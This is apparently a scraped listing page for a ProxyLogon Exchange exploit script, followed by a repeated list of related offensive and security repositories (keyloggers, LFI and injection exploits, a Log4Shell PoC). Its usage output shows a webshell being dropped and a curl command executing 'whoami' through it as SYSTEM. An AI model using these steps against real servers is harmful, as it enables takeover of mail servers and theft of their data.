ProxyLogon Pre-Auth SSRF To Arbitrary File Write

Last update: Nov 28, 2022

Overview

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

For Education and Research

Usage:

C:\>python proxylogon.py mail.evil.corp [email protected]
Attacking target mail.evil.corp
=============================
Got DN: /o=EVIL CORP/ou=first administrative group/cn=Recipients/cn=Administrator
Got SID: S-1-5-21-175943541-xxxxxxxxxx-3152120021-500
Got session id: a99eda32-xxxx-xxxx-825b-5f1c4a6080e7
Got canary: rOWUk7lmAUC2-5HIlQ4EpGq1rPu959xxxxxxxxxx_xxxxxxx_xxx_a-KJ5WR-9j95yu-JOv3dFY.
=========== It means good to go!!!====
Got OAB id: 2f3d4600-xxxx-xxxx-xxxx-b4a4c1d3fb58
Successful!
(+) Webshell drop at https://mail.evil.corp/owa/auth/evilcorp.aspx
(+) Enjoy your shell: curl -ik https://mail.evil.corp/owa/auth/evilcorp.aspx -d 'exec_code=Response.Write(new ActiveXObject("WScript.Shell").exec("cmd /c whoami").stdout.readall())
CMD: whoami
nt authority\system

Owner

lulz

retarded kid trying to use internet

GitHub Repository

This project is all about building an amazing application that will help users manage their passwords and even generate new passwords for them

An amazing application that will help us manage our passwords and even generate new passwords for us.

1 Jan 23, 2022

Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI

LFI-Hunter Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI A script written in

6 Jan 30, 2022

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

3 Sep 26, 2022

AnonStress-Stored-XSS-Exploit - An exploit and demonstration on how to exploit a Stored XSS vulnerability in anonstress

AnonStress Stored XSS Exploit An exploit and demonstration on how to exploit a S

3 Jun 22, 2022

IDA Frida Plugin for tracing something interesting.

IDAFrida A simple IDA plugin to generate FRIDA script. Edit template for functions or you can use the default template. Select functions you want to t

133 Dec 24, 2022

⛤Keylogger Generator for Windows written in Python⛤

33 Nov 24, 2022

This repository will contain python scripts for hackers and pentesters

This repository will contain python scripts for hackers and pentesters. stop being limited with availble tools. Build your own.

24 Nov 29, 2022

Password List Maker

Red-Key Red-Key Password List Maker Version 1.1.2 Created By FireKing255 -=Features=- Create Random Password List Create Password List Create Password

7 Dec 26, 2021

MongoDB-Injection - This challenge-script is custom-made for web-server running MongoDB which is vulnerable to No-SQL injection

MongoDB-Injection Cheesy Multi-threaded script for NoSQL Injection This challeng

2 Jun 06, 2022

Moodle community-based vulnerability scanner

badmoodle Moodle community-based vulnerability scanner Description badmoodle is an unofficial community-based vulnerability scanner for moodle that sc

11 Dec 22, 2022

Bilgi Sistemleri Projesi için yapılan keylogger

Keylogger Bilgi Sistemleri Projesi için yapılan keylogger Projede kullanılan kütüphanelere sahip olmasanız da python dosyası çalıştığında kendisi gere

1 Jan 07, 2022

CVE-2022-23046 - SQL Injection Vulnerability on PhpIPAM v1.4.4

CVE-2022-23046 PhpIPAM v1.4.4 allows an authenticated admin user to inject SQL s

2 Feb 15, 2022

Check for breached passwords with k-anonymity

passwnd Check for breached passwords with k-anonymity Usage To get prompted to enter the password securely, simply run: passwnd.py Alternatively, you

1 Feb 08, 2022

Log4Shell Proof of Concept (CVE-2021-44228)

CVE-2021-44228 Log4Shell Proof of Concept (CVE-2021-44228) Make sure to use Java 8 JDK. Java 8 Download Images Credits Casey Dunham - Java Reverse She

3 Jul 23, 2022

𝙾𝚙𝚎𝚗 𝚂𝚘𝚞𝚛𝚌𝚎 𝚂𝚌𝚛𝚒𝚙𝚝 - 𝙽𝚘 𝙲𝚘𝚙𝚢𝚛𝚒𝚐𝚑𝚝 - 𝚃𝚎𝚊𝚖 𝚆𝚘𝚛𝚔 - 𝚂𝚒𝚖𝚙𝚕𝚎 𝙿𝚢𝚝𝚑𝚘𝚗 𝙿𝚛𝚘𝚓𝚎𝚌𝚝 - 𝙲𝚛𝚎𝚊𝚝𝚎𝚍 𝙱𝚢 : 𝙰𝚕𝚕 𝚃𝚎𝚊𝚖 - 𝙲𝚘𝚙𝚢𝙿𝚊𝚜𝚝 𝙲𝚊𝚗 𝙽𝚘𝚝 𝙼𝚊𝚔𝚎 𝚈𝚘𝚞 𝚁𝚎𝚊𝚕 𝙿𝚛𝚘𝚐𝚛𝚊𝚖𝚖𝚎𝚛

𝙾𝚙𝚎𝚗 𝚂𝚘𝚞𝚛𝚌𝚎 𝚂𝚌𝚛𝚒𝚙𝚝 - 𝙽𝚘 𝙲𝚘𝚙𝚢𝚛𝚒𝚐𝚑𝚝 - 𝚃𝚎𝚊𝚖 𝚆𝚘𝚛𝚔 - 𝚂𝚒𝚖𝚙𝚕𝚎 𝙿𝚢𝚝𝚑𝚘𝚗 𝙿𝚛𝚘𝚓𝚎𝚌𝚝 - 𝙲𝚛𝚎𝚊𝚝𝚎𝚍 𝙱𝚢 : 𝙰𝚕𝚕 𝚃𝚎𝚊𝚖 - 𝙲𝚘𝚙𝚢𝙿𝚊𝚜𝚝 𝙲𝚊𝚗 𝙽𝚘𝚝 𝙼𝚊𝚔𝚎 𝚈𝚘𝚞 𝚁𝚎𝚊𝚕 𝙿𝚛𝚘𝚐𝚛𝚊𝚖𝚖𝚎𝚛

2 Oct 27, 2022

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

Related tags

Overview

ProxyLogon Pre-Auth SSRF To Arbitrary File Write

Usage:

Owner

lulz

This project is all about building an amazing application that will help users manage their passwords and even generate new passwords for them

Searches for potentially vulnerable websites to local file inclusion, throughout the web and then exploits them for LFI

A python script to decrypt media files encrypted using the Android application 'Decrypting 'LOCKED Secret Calculator Vault''. Will identify PIN / pattern.

AnonStress-Stored-XSS-Exploit - An exploit and demonstration on how to exploit a Stored XSS vulnerability in anonstress

IDA Frida Plugin for tracing something interesting.

⛤Keylogger Generator for Windows written in Python⛤

This repository will contain python scripts for hackers and pentesters

Password List Maker

MongoDB-Injection - This challenge-script is custom-made for web-server running MongoDB which is vulnerable to No-SQL injection

Moodle community-based vulnerability scanner

Bilgi Sistemleri Projesi için yapılan keylogger

CVE-2022-23046 - SQL Injection Vulnerability on PhpIPAM v1.4.4

Check for breached passwords with k-anonymity

Log4Shell Proof of Concept (CVE-2021-44228)

This is the fuzzer I made to fuzz Preview on macOS and iOS like 8years back when I just started fuzzing things.

This project is for finding a solution to use Security Onion Elastic data with Jupyter Notebooks.

CC CAMERA HACKING TOOL

Threat research and reporting from IronNet's Threat Research Teams

WinRemoteEnum is a module-based collection of operations achievable by a low-privileged domain user.